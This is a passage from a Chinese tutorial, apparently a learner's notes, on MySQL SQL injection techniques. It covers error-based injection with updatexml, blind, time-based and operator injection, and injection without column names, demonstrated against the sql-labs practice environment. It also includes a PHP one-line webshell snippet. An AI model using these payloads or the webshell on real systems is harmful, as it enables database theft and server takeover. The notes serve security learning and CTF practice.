<p>like的用法大体上和regexp一致，只有符号表示有区别<br>like只有%<br>例如：select [表，列等] from [库，表等] where [指定检索] like ‘[关键字]’<br>select users from security where security like ‘G%’;<br>//返回以G开头的字段<br>同理：’%G’ - 返回以G结尾的字段,’%G%’ - 返回包含G的字段。  </p>
</blockquote>
</li>
</ul>
<h3 id="简易查看"><a href="#简易查看" class="headerlink" title="简易查看"></a>简易查看</h3><ul>
<li><p>database()<br>查看当前数据库：select database();  </p>
</li>
<li><p>user()<br>查看当前登录的用户：select user();  </p>
</li>
<li><p>version()<br>查看当前的数据库版本   </p>
</li>
</ul>
<h3 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h3><ul>
<li><p>rand()函数  </p>
<blockquote>
<p>rand，random简写，译：随机的<br>在sql中用于返回一个范围在0-1的随机数，这点等同于excl表格<br>在如c、python等语言中，rand()函数用于返回伪随机数（随机整数），非0-1<br>特别的：<br>1、在rand后指定一个数，如rand(1),得到的随机数将固定，可以为小数，该方法遵循四舍五入法则<br>2、在rand()*N[N是一个数]将返回从0-N的随机数，但我测试后，我认为是将rand()得到的随机数乘N，N可以为小数<br>3、可以用于order by后，返回打乱顺序的列  </p>
</blockquote>
</li>
<li><p>floor()函数  </p>
<blockquote>
<p>floor，译:地板，与c语言的地板除法类似<br>功能是取整（同c地板除法一样为向下取整）<br>例如：floor(2.9)=2  </p>
</blockquote>
</li>
<li><p>round()函数   </p>
<blockquote>
<p>round,译：绕行，绕过，把数字四舍五入<br>功能同floor为取整，不同于floor向下取整，round是将数四舍五入  </p>
</blockquote>
</li>
<li><p>ceiling()函数  </p>
<blockquote>
<p>ceiling，译：天花板<br>功能同floor为取整，但ceiling函数为向上取整  </p>
</blockquote>
</li>
<li><p>count()函数  </p>
<blockquote>
<p>count，译：计数<br>例如：<br>count(columns)//返回列数<br>count(*)//输出总行数  </p>
</blockquote>
</li>
<li><p>updatexml()函数  </p>
<blockquote>
<p>updatexml是基于PATH传参的函数<br>xml是xml文档的名称，中文为doc<br>updatexml译：更新xml文档<br>用于在sql中报错注入<br>语法：updatexml(XML_document,Xpath_string, new_value);<br>xml_document:原来文档的名称，是string类型<br>Xpath_string:Xpath格式的字符串，文件的路径<br>new_value：新的值，用于替换查找到符合条件的字符串<br>注意：因Xpath_string是字符串形式，所以若想正常报错，需用concat函数将返回的值连接  </p>
</blockquote>
</li>
<li><p>-&gt;原理：<br>文件路径是不允许非法字符出现的，当出现非法字符就会爆出错误<br>所以使用查询语句查询后，和非法字符连接，就会形成报错<br>如：updatexml(1,(select concat(0x7e,schema_name) from information_schema.schemata limit 0,1),0)–+<br>这里0x7e是16进制的“<del>”，属于非法字符，当</del>放在合法的数据库名前，就会以非法路径报错<br>数据库本质类似文件夹，可以作为路径使用，不过这里是因为我们可以写入任意值作为路径，对不对倒是无所谓  </p>
</li>
</ul>
<blockquote>
<p>除了select，还可以利用updatexml完成insert，update和delete注入，原理和select相同。<br> insert into guestbook(comment_id,comment,name) values (2,’0livia’ or updatexml(1,concat(0x7e,(version())),0) or’’,’Nervo’)<br> delete from guestbook where comment_id=2 or updatexml(2,concat(0x7e,(database())),0)  </p>
</blockquote>
<ul>
<li>extractvalue()函数   <blockquote>
<p>extract value译：提取值<br>功能：查询文档，相当于HTML文件中用 div&gt;<p> <a></a>标签查找元素<br>语法：<br>extractvalue(xml文档名,路径)<br>原理同updatexml(),都是基于路径不能有非法字符  </p>
</blockquote>
</li>
</ul>
<h3 id="正则匹配"><a href="#正则匹配" class="headerlink" title="正则匹配"></a>正则匹配</h3><p>sql支持正则匹配</p>
<pre class="line-numbers language-sql"><code class="language-sql"><span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> users <span class="token keyword">where</span> id<span class="token operator">=</span><span class="token number">1</span> <span class="token operator">and</span> <span class="token operator">regexp</span> <span class="token string">'正则表达式'</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<ul>
<li><p>规则：</p>
<p>  <code>^str</code>表示匹配以str为开头的字符</p>
<p>  <code>str</code>匹配str</p>
<p>  <code>str$</code>表示匹配以str为结尾的字符</p>
</li>
<li><p>匹配多个字符</p>
</li>
</ul>
<table>
<thead>
<tr>
<th>元字符</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td>*</td>
<td>0个或多个匹配</td>
</tr>
<tr>
<td>+</td>
<td>1个或多个匹配</td>
</tr>
<tr>
<td>？</td>
<td>0个或1个匹配</td>
</tr>
<tr>
<td>{n}</td>
<td>指定数目的匹配</td>
</tr>
<tr>
<td>{n，}</td>
<td>不少于指定数目的匹配</td>
</tr>
<tr>
<td>{n,m}</td>
<td>匹配数目的范围（m不超过255）</td>
</tr>
</tbody></table>
<h2 id="注入攻击"><a href="#注入攻击" class="headerlink" title="注入攻击"></a>注入攻击</h2><blockquote>
<p>SQL注入攻击（SQL Injection），简称注入攻击，是Web开发中最常见的一种安全漏洞。可以用它来从数据库获取敏感信息，或者利用数据库的特性执行添加用户，导出文件等一系列恶意操作，甚至有可能获取数据库乃至系统用户最高权限。  </p>
</blockquote>
<p>而造成SQL注入的原因是因为程序没有有效过滤用户的输入，使攻击者成功的向服务器提交恶意的SQL查询代码，程序在接收后错误的将攻击者的输入作为查询语句的一部分执行，导致原始的查询逻辑被改变，额外的执行了攻击者精心构造的恶意代码。  </p>
<h3 id="写入文件"><a href="#写入文件" class="headerlink" title="写入文件"></a>写入文件</h3><ul>
<li>查看是否有读写权限</li>
</ul>
<blockquote>
<p><code>file_priv</code>是对于用户的文件读写权限，若无权限则不能进行文件读写操作，可通过下述payload查询权限。</p>
<pre class="line-numbers language-sql"><code class="language-sql"><span class="token keyword">select</span> file_priv <span class="token keyword">from</span> mysql<span class="token punctuation">.</span><span class="token keyword">user</span> <span class="token keyword">where</span> <span class="token keyword">user</span><span class="token operator">=</span>$<span class="token keyword">USER</span>  host<span class="token operator">=</span>$HOST<span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><code>secure-file-priv</code>是一个系统变量，对于文件读/写功能进行限制。具体如下：</p>
<ul>
<li>无内容，表示无限制。</li>
<li>为NULL，表示禁止文件读/写。</li>
<li>为目录名，表示仅允许对特定目录的文件进行读/写。</li>
</ul>
<p>注：<strong>5.5.53本身及之后的版本默认值为NULL，之前的版本无内容</strong>。</p>
<p>三种方法查看当前<code>secure-file-priv</code>的值：</p>
<pre class="line-numbers language-sql"><code class="language-sql"><span class="token keyword">select</span> @<span class="token variable">@secure_file_priv</span><span class="token punctuation">;</span>
<span class="token keyword">select</span> @<span class="token variable">@global.secure_file_priv</span><span class="token punctuation">;</span>
<span class="token keyword">show</span> variables <span class="token operator">like</span> <span class="token string">"secure_file_priv"</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>修改：</p>
<ul>
<li>通过修改my.ini文件，添加：<code>secure-file-priv=</code></li>
<li>启动项添加参数：<code>mysqld.exe --secure-file-priv=</code></li>
</ul>
</blockquote>
<ul>
<li><p>写入小马——一句话木马  </p>
<blockquote>
<p>php木马  </p>
<?php @evil($_POST(["密码值"]);?></blockquote>
</li>
<li><p>eval()函数  </p>
<blockquote>
<p>eval 译：邪恶的，目前常见于一句话木马攻击<br>用法：<br>eval(数字)，返回数字<br>eval(字符串)，解析字符串，作为代码运行   </p>
</blockquote>
</li>
<li><p>_POST()函数与GET()函数<br>POST和GET都是bai向服务器提交数据，并且都会从服务器获取数据。</p>
</li>
<li><p>区别：<br> 1、传送方式：get通过地址栏传输，post通过报文传输。  </p>
</li>
</ul>
<p>  2、传送长度：get参数有长度限制（受限于url长度），而post无限制  </p>
<p>  3、GET和POST还有一个重大区别，简单的说：  </p>
<p>  GET产生一个TCP数据包；POST产生两个TCP数据包  </p>
<p>  长的说：  </p>
<p>  对于GET方式的请求，浏览器会把http header和data一并发送出去，服务器响应200（返回数据）；  </p>
<p>  而对于POST，浏览器先发送header，服务器响应100 continue，浏览器再发送data，服务器响应200 ok（返回数据）。  </p>
<p>  过程不同<br>  GET是把参数数据队列加到提交表单的ACTIONbai性所指的URL中，值和表单内各个字段一一对应，在URL中可以看到<br>  POST是通过HTTP post机制，将表单内各个字段与其内容放置在HTML HEADER内一起传送到ACTIONbai性所指的URL地址。用户看不到这个过程。    </p>
<p>  获取值不同<br>  对于get方式，服务器端用Request.QueryString获取变量的值。<br>  对于post方式，服务器端用Request.Form获取提交的数据。  </p>
<p>  传送数据量不同<br>  get传送的数据量较小，不能大于2KB。<br>  post传送的数据量较大，一般被默认为不受限制。但理论上，IIS4中最大量为80KB，IIS5中为100KB。   </p>
<h3 id="盲注"><a href="#盲注" class="headerlink" title="盲注"></a>盲注</h3><h4 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="布尔盲注"></a>布尔盲注</h4><ul>
<li>if()函数<blockquote>
<p>if(语句,正确,错误)<br>例如：if((ascii(substr((select database()),1,1))) &gt; 122 ,1,2)<br>如果database第一个字符的ascii值大于122,返回1，否则返回2<br>完整语句：<br>?id=1’ and if((ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))&gt;22),1,0)–+  </p>
</blockquote>
</li>
</ul>
<h4 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h4><ul>
<li><p>length()函数  </p>
<blockquote>
<p>length 译为：长度<br>用于返回字符串长度<br>如：length(“security”)或 length(select database())=8  </p>
</blockquote>
</li>
<li><p>sleep()函数  </p>
<blockquote>
<p>sleep 译为：睡觉<br>用于延迟网页响应<br>如：sleep(5) //延迟5秒后响应 或 睡眠5秒  </p>
</blockquote>
</li>
<li><p>benchmark()函数</p>
<blockquote>
<p>bench mark 译为基准点</p>
<p>用于循环执行一条语句</p>
<p><strong>BENCHMARK（count,expr) 函数重复count次执行表达式expr，它可以用于计时MySQL处理表达式有多快，结果值总是0。</strong></p>
<p>语法;</p>
<p>benchmark(执行次数，执行语句)，注入时用发同sleep()</p>
<pre class="line-numbers language-sql"><code class="language-sql"><span class="token number">1</span><span class="token string">' and if(1=1,benchmark(1000000,md5('</span>test'<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token comment" spellcheck="true">--+</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>benchmark()函数还可以用在select查询中</p>
<pre class="line-numbers language-sql"><code class="language-sql"> <span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> users <span class="token keyword">where</span> id<span class="token operator">=</span><span class="token number">0</span> <span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span>benchmark<span class="token punctuation">(</span><span class="token number">10000000000000000</span><span class="token punctuation">,</span>md5<span class="token punctuation">(</span><span class="token string">'test'</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>当语句正确时benchmark执行，页面显示延时</p>
<p>这样就巧妙的绕过了if()函数对盲注的影响</p>
<p>当然运算符注入也可以脱离if</p>
</blockquote>
</li>
</ul>
<h4 id="运算符注入"><a href="#运算符注入" class="headerlink" title="运算符注入"></a>运算符注入</h4><p>php和mysql中存在多种运算符，这些运算符也可以应用在注入中</p>
<p>CTF中这种注入方式很常见</p>
<ul>
<li><p>异或运算</p>
<blockquote>
<p>符号：xor 或 ^<br>a ^ b 当a,b相同时返回0，不同时返回1<br>如</p>
</blockquote>
<pre class="line-numbers language-sql"><code class="language-sql">id<span class="token operator">=</span><span class="token number">1</span>'<span class="token operator">^</span> <span class="token punctuation">(</span>length<span class="token punctuation">(</span><span class="token string">"union"</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token number">5</span><span class="token punctuation">)</span><span class="token comment" spellcheck="true">--+</span>
当<span class="token keyword">union</span>未被过滤返回<span class="token number">0</span><span class="token punctuation">,</span>过滤返回<span class="token number">1</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<pre class="line-numbers language-sql"><code class="language-sql"><span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> users <span class="token keyword">where</span> id<span class="token operator">=</span><span class="token number">1</span><span class="token operator">^</span><span class="token number">1</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="image-20210525155303335.png" alt="image-20210525155303335"></p>
</li>
<li><p>等于运算</p>
<blockquote>
<p>符号：= 或 like</p>
<p>a=b时返回1，否则返回0</p>
<p>如：</p>
<pre class="line-numbers language-SQL"><code class="language-SQL">select * from users where id=(1=1);
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="image-20210525155623553.png" alt="image-20210525155623553"></p>
<p>注入语句：</p>
<p><img src="image-20210525155724010.png" alt="image-20210525155724010"></p>
</blockquote>
</li>
<li><p>不等运算</p>
<blockquote>
<p>sql有一个特殊的不等运算符：&lt;&gt;</p>
<p>用法同!=</p>
<pre class="line-numbers language-sql"><code class="language-sql"><span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> users <span class="token keyword">where</span> id<span class="token operator">=</span><span class="token number">1</span><span class="token operator">=</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token operator">&lt;></span><span class="token number">0</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token number">1</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="image-20210525155923856.png" alt="image-20210525155923856"></p>
</blockquote>
</li>
<li><p>非运算</p>
<blockquote>
<p>sql允许！（非运算符）的存在</p>
<p>通过！假或！真，我们就可以灵活的注入各种情况</p>
<p><img src="image-20210525160654754.png" alt="image-20210525160654754"></p>
<p>或者：</p>
<p><img src="image-20210525160823944.png" alt="image-20210525160823944"></p>
</blockquote>
</li>
</ul>
<h2 id="无列名注入"><a href="#无列名注入" class="headerlink" title="无列名注入"></a>无列名注入</h2><blockquote>
<p>有些时候，我们无法得列名，这种情况包括但不限于过滤了information_schema库</p>
</blockquote>
<h3 id="表名的多种查询方式"><a href="#表名的多种查询方式" class="headerlink" title="表名的多种查询方式"></a>表名的多种查询方式</h3><ul>
<li>系统库概念</li>
</ul>
<blockquote>
<p>mysql系统自带的库一共有四个分别为information_schema,mysql,perfromance_schema,sys</p>
</blockquote>
<ul>
<li>information_schema库</li>
</ul>
<blockquote>
<p>information_schema是一个信息数据库，记录了其他所有数据库的信息</p>
<p>这是查询表名，列名最常用的库</p>
</blockquote>
<ul>
<li>mysql库</li>
</ul>
<blockquote>
<p>mysql库是mysql的核心数据库，负责储存数据库的用户，权限设置，root密码就储存在这里</p>
<p>这个数据库同样储存了表名</p>
<p>从MYSQL5.5.8开始，InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中，inndb增加了innodb_index_stats和innodb_table_stats两张表，这两张表中都存储了数据库和其数据表的信息，但是没有存储列名。</p>
</blockquote>
<blockquote>
<p>payload:</p>
<pre class="line-numbers language-sql"><code class="language-sql"><span class="token keyword">select</span> group_concat<span class="token punctuation">(</span>table_name<span class="token punctuation">)</span> <span class="token keyword">from</span> mysql<span class="token punctuation">.</span>innodb_table_stats <span class="token operator">||</span> mysql<span class="token punctuation">.</span>inndb_index_starts
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
</blockquote>
<ul>
<li>performance_schema库</li>
</ul>
<blockquote>
<p>performance_schema 主要用于手机服务器性能参数</p>
</blockquote>
<ul>
<li>sys 库</li>
</ul>
<blockquote>
<p>Sys库所有的基础数据来自information_schema和performance_chema。目标是把performance_schema的把复杂度降低，其本身不储存数据</p>
<p>让DBA能更好的阅读这个库里的内容。让DBA更快的了解DB的运行情况。</p>
<p>可以通过其中的schema_auto_increment_columns 表来获取表名。</p>
</blockquote>
<h3 id="无列名原理"><a href="#无列名原理" class="headerlink" title="无列名原理"></a>无列名原理</h3><ul>
<li>原理</li>
</ul>
<blockquote>
<p>原理和给列别名类似，类似于在取别名的同时查询数据</p>
<p>当然我认为有联合查询的影子</p>
</blockquote>
<ul>
<li><p>payload举例：</p>
<p>  当select 1,2,3;时，数据库会自动建立一个列名和数据都为123的虚拟库</p>
<pre class="line-numbers language-sql"><code class="language-sql"><span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>  <img src="image-20210524111601355.png" alt="image-20210524111601355"></p>
<p>  联合查询基于这个原理，是将123写入列名下查看回显和数据</p>
<pre class="line-numbers language-sql"><code class="language-sql"><span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> users <span class="token keyword">where</span> id<span class="token operator">=</span><span class="token number">0</span> <span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>  <img src="image-20210524111818234.png" alt="image-20210524111818234"></p>
<p>  无列名原理恰好与此相反，是将数据写入虚拟的1,2,3,列下</p>
<pre class="line-numbers language-sql"><code class="language-sql"><span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">3</span> <span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> users<span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
</li>
</ul>
<p><img src="image-20210524111959779.png" alt="image-20210524111959779"></p>
<p>这样做，我们便从不知到列名，变成了自定义一个列名，查询这个虚拟表，就得到了数据</p>
<h3 id="起别名查询"><a href="#起别名查询" class="headerlink" title="起别名查询"></a>起别名查询</h3><p>知道原理，我们可以明白，无列名注入的基本语句如下</p>
<pre class="line-numbers language-sql"><code class="language-sql"><span class="token keyword">select</span> <span class="token punctuation">`</span><span class="token number">3</span><span class="token punctuation">`</span> <span class="token keyword">from</span> <span class="token punctuation">(</span><span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">3</span> <span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> users<span class="token punctuation">)</span><span class="token punctuation">;</span> 
<span class="token comment" spellcheck="true">#括号中的语句表示创建的虚拟表</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p>理论上这样没有错误，但括号里得到的是一个虚拟表，没有表名，会发生报错，所以我们需要给它起个表名</p>
<pre class="line-numbers language-sql"><code class="language-sql"><span class="token keyword">select</span> <span class="token punctuation">`</span><span class="token number">3</span><span class="token punctuation">`</span> <span class="token keyword">from</span> <span class="token punctuation">(</span><span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">3</span> <span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> users<span class="token punctuation">)</span><span class="token number">a</span><span class="token punctuation">;</span> <span class="token operator">||</span> <span class="token keyword">as</span> <span class="token number">a</span>
<span class="token comment" spellcheck="true">#直接跟a或者as a都是起别名的方式，这里a是我们给虚拟表别名</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p><img src="image-20210524113358646.png" alt="image-20210524113358646"></p>
<p><strong>注意：3使用反引号包括，因为在虚拟表中，列名都是1，2，3，所以我们在查询语句中不能直接用 3 。</strong></p>
<p>有时反引号被过滤，所有可以用另一种方式</p>
<pre class="line-numbers language-sql"><code class="language-sql"> <span class="token keyword">select</span> A <span class="token keyword">from</span> <span class="token punctuation">(</span><span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token string">'A'</span> <span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> users<span class="token punctuation">)</span><span class="token number">a</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="image-20210524113744160.png" alt="image-20210524113744160"></p>
<p>或者给要查询的列也起别名</p>
<pre class="line-numbers language-sql"><code class="language-sql"><span class="token keyword">select</span> <span class="token number">c</span> <span class="token keyword">from</span> <span class="token punctuation">(</span><span class="token keyword">select</span> <span class="token number">1</span> <span class="token keyword">as</span> <span class="token number">a</span><span class="token punctuation">,</span><span class="token number">2</span> <span class="token keyword">as</span> <span class="token number">b</span><span class="token punctuation">,</span><span class="token number">3</span> <span class="token keyword">as</span> <span class="token number">c</span> <span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> users<span class="token punctuation">)</span>n
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="image-20210524114004881.png" alt="image-20210524114004881"></p>
<h3 id="注入示例"><a href="#注入示例" class="headerlink" title="注入示例"></a>注入示例</h3><blockquote>
<p>这里以sql-labs-1为例</p>
</blockquote>
<ul>
<li>payload</li>
</ul>
<blockquote>
<pre class="line-numbers language-php"><code class="language-php">http<span class="token punctuation">:</span><span class="token comment" spellcheck="true">//127.0.0.1/sql-labs/Less-1/?id=0' union select 1,2,group_concat(`3`) from (select 1,2 ,3 union select * from security.users)n--+</span>
<span class="token shell-comment comment">#联合注入之无列名注入</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
</blockquote>
<p>无列名只是把查询真实表改为了查询虚拟表，其他部分差别不大</p>
<h3 id="无列名时使用join得到字段名"><a href="#无列名时使用join得到字段名" class="headerlink" title="无列名时使用join得到字段名"></a>无列名时使用join得到字段名</h3><ul>
<li><p>原理</p>
<p>  join 用于连接两个表，将两个表的数据同时显示</p>
<p>  <img src="image-20210524194300573.png" alt="image-20210524194300573"></p>
<p>  上图是将两表简单相合，是一个无名称的虚拟表</p>
<p>  当两表中列名存在重复时给虚拟表起别名，便会报错</p>
<p>  如下</p>
<pre class="line-numbers language-sql"><code class="language-sql"><span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> <span class="token punctuation">(</span><span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> users <span class="token number">a</span> <span class="token keyword">join</span> emails <span class="token number">b</span><span class="token punctuation">)</span><span class="token keyword">as</span> <span class="token number">a</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>  先分别查出users和emails的数据，并连接为一个虚拟表，起别名为a，然后查询虚拟表a，这时a表会出现名称重复的字段，数据库报错</p>
<p>  <img src="image-20210524200514332.png" alt="image-20210524200514332"></p>
<p>  原理同下</p>
<p>  <img src="image-20210524200634790.png" alt="image-20210524200634790"></p>
<p>  通过这个原理，我们就可以在系统库被过滤的情况中完成对列名的注入</p>
</li>
</ul>
<h4 id="无列名payload示例"><a href="#无列名payload示例" class="headerlink" title="无列名payload示例"></a>无列名payload示例</h4><blockquote>
<pre class="line-numbers language-sql"><code class="language-sql"><span class="token comment" spellcheck="true">#完整sql语句</span>
<span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> users <span class="token keyword">where</span> id<span class="token operator">=</span><span class="token string">'0'</span> <span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">3</span> <span class="token keyword">from</span> <span class="token punctuation">(</span><span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> users <span class="token keyword">join</span> users <span class="token number">b</span> <span class="token keyword">using</span><span class="token punctuation">(</span>id<span class="token punctuation">)</span><span class="token punctuation">)</span>n<span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p><img src="image-20210524201435423.png" alt="image-20210524201435423"></p>
</blockquote>
<ul>
<li><p>详解</p>
<pre class="line-numbers language-sql"><code class="language-sql"><span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> users <span class="token keyword">where</span> id<span class="token operator">=</span><span class="token string">'$id'</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>  这是系统本身的查询语句</p>
<pre class="line-numbers language-sql"><code class="language-sql"><span class="token number">0</span>' <span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">3</span> <span class="token keyword">from</span> <span class="token punctuation">(</span>语句体<span class="token punctuation">)</span>n<span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>  这里构造了一个典型的联合查询，n为表名，语句体是无列名注入的语句</p>
<pre class="line-numbers language-sql"><code class="language-sql"><span class="token number">0</span>' <span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">3</span> <span class="token keyword">from</span> <span class="token punctuation">(</span><span class="token keyword">select</span> users <span class="token keyword">join</span> users <span class="token number">b</span><span class="token punctuation">)</span>n<span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>  括号中语句构造了一个虚拟表，因为是由两个users表使用join语句连接而成，所以必然出现列名重复报错，别名为n便于查询</p>
<pre class="line-numbers language-sql"><code class="language-sql"><span class="token number">0</span>' <span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">3</span> <span class="token keyword">from</span> <span class="token punctuation">(</span><span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> users <span class="token keyword">join</span> users <span class="token number">a</span><span class="token punctuation">)</span>n<span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>  join查询的两个表不能重名，所以要将一个表起别名</p>
<pre class="line-numbers language-sql"><code class="language-sql"><span class="token number">0</span>' <span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">3</span> <span class="token keyword">from</span> <span class="token punctuation">(</span><span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> users <span class="token keyword">join</span> users <span class="token number">a</span> <span class="token keyword">using</span><span class="token punctuation">(</span>id<span class="token punctuation">)</span><span class="token punctuation">)</span>n<span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>  using()方法用于join中，规定join两个表连接时字段名相同的列</p>
<p>  使用using()后，列名不会重复</p>
<p>  <img src="image-20210525151501090.png" alt="image-20210525151501090"></p>
<p>  同一张表也遵循这个原理</p>
<p>  <img src="image-20210525151557761.png" alt="image-20210525151557761"></p>
<p>  using()目的：</p>
<p>  <strong>列名重复报错只会报错第一列，而不会全部报错</strong></p>
<p>  <strong>using()方法可以解决这个问题</strong></p>
</li>
<li><p>注入完整语句</p>
<pre class="line-numbers language-sql"><code class="language-sql">http:<span class="token comment" spellcheck="true">//127.0.0.1/sql-labs/Less-1/?id=0' union select 1,2,3 from (select * from users join users b using(id,username))n--+</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>  <img src="image-20210525152003540.png" alt="image-20210525152003540"></p>
</li>
</ul>
<h2 id="过滤括号的order-by-大小比较注入"><a href="#过滤括号的order-by-大小比较注入" class="headerlink" title="过滤括号的order by 大小比较注入"></a>过滤括号的order by 大小比较注入</h2><h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h3><ul>
<li>order by 方法用于指定列排序，默认是升序</li>
<li>union select 联合查询可以输出一个虚拟表，表中同时存在原表的数据和联合的数据</li>
<li>order by 同样可以对虚拟表进行排序</li>
</ul>
<h3 id="payload举例"><a href="#payload举例" class="headerlink" title="payload举例"></a>payload举例</h3><blockquote>
<pre class="line-numbers language-sql"><code class="language-sql"><span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> users <span class="token keyword">where</span> id<span class="token operator">=</span><span class="token number">1</span> <span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">3</span> <span class="token keyword">order</span> <span class="token keyword">by</span> <span class="token number">3</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="image-20210526180009845.png" alt="image-20210526180009845"></p>
</blockquote>
<p><strong>目标是得到password的数据，使用union select 1,2,3 时，联合的第三列虚拟数据为3和Dumb,order by 排序时默认升序，所以会将3排在首列，当union select 连接的数据为1,2,”E”时，E比原表的D值更大，于是E排在了Dumb下面</strong></p>
<p><img src="image-20210526180533170.png" alt="image-20210526180533170"></p>
<p>这两种情况的页面回显必然有所不同，这样就可以通过回显来判断出password数据</p>
<p><img src="image-20210526180748854.png" alt="image-20210526180748854"></p>
<h2 id="特殊拦截的绕过方法"><a href="#特殊拦截的绕过方法" class="headerlink" title="特殊拦截的绕过方法"></a>特殊拦截的绕过方法</h2><h3 id="过滤逗号"><a href="#过滤逗号" class="headerlink" title="过滤逗号"></a>过滤逗号</h3><blockquote>
<p>使用盲注</p>
